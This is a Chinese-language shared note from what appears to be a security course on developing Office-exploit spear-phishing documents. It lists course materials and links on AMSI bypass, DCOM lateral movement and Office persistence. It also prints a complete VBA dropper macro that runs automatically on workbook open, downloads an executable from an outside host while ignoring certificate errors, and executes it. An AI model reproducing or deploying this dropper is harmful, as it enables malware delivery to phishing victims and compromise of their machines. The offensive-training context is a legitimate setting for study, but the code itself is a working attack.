# Office漏洞魚叉開發實務 discord https://discord.gg/43rC374F zha0大大的教材：https://drive.google.com/drive/folders/1ch6SiyK_2GUbtEl8Ylfom5kmsP1nIUQ3?usp=sharing 此次課程共筆： Day1 https://hackmd.io/@Not/ccoe2021_01 Day2 https://hackmd.io/@Not/ccoe2021_02 Day3 https://hackmd.io/@Not/ccoe2021_03 討論筆記：https://docs.google.com/document/d/1PSSzlyeGWnK-DeXPbK84KpcWFZFOI1JQFTMMcO-J1Is/edit Day4 https://hackmd.io/@Not/ccoe2021_04 # 講師快喝水！辛苦了！！！！！ -> [考卷](https://forms.gle/MQA99i7CKZZXc2rd8) [教材包 @ OneDrive](https://1drv.ms/u/s!AgFJGv5jxW7fgs1s6IrbGMiZ-ptxrA?e=QdUD6y) ## 補充 * [內網橫向移動 - Excel4-DCOM](https://github.com/outflanknl/Excel4-DCOM) * [Outflank: Bypass AMSI for VBA](https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/) * [利用 Office 来进行系统权限维持](https://mp.weixin.qq.com/s/SZPmGDfDIpK3fP5nlHUcMA) * [谈谈Office Moniker类漏洞和公式编辑器类漏洞](https://www.anquanke.com/post/id/231427) ## Dropper Example ```vba= Sub Workbook_Open() Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP") WinHttpReq.setOption(2) = 13056 ' Ignore cert errors WinHttpReq.Open "GET", "http://arsenal.30cm.tw/picaball.exe", False WinHttpReq.Send Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.ResponseBody oStream.SaveToFile "123.pif", 2 ' 1 = no overwrite, 2 = overwrite (will not work with file attrs) oStream.Close Shell "cmd /c 123.pif" End Sub ``` ---- -> [64-bit Function Pointer (VBA)](https://gist.github.com/aaaddress1/4d50204b956721c721acc84f843a1b15) -> [PE to Shellcode](https://github.com/hasherezade/pe_to_shellcode/releases/tag/v0.9) Q：請問64位元是指OS還是office A:office 請看書實作第七章。 https://gist.github.com/aaaddress1/1ca8fe5ba25b0fa422aca6cddb479bc6 下載Office 365 x64方法- https://support.microsoft.com/zh-tw/office/%E5%9C%A8-pc-%E6%88%96-mac-%E4%B8%8A%E4%B8%8B%E8%BC%89%E4%B8%A6%E5%AE%89%E8%A3%9D%E6%88%96%E9%87%8D%E6%96%B0%E5%AE%89%E8%A3%9D-microsoft-365-%E6%88%96-office-2021-4414eaaf-0478-48be-9c42-23adc4716658#InstallSteps=PC_step-by-step  --- ## XLUnicodeStringNoCch 字串注入玩法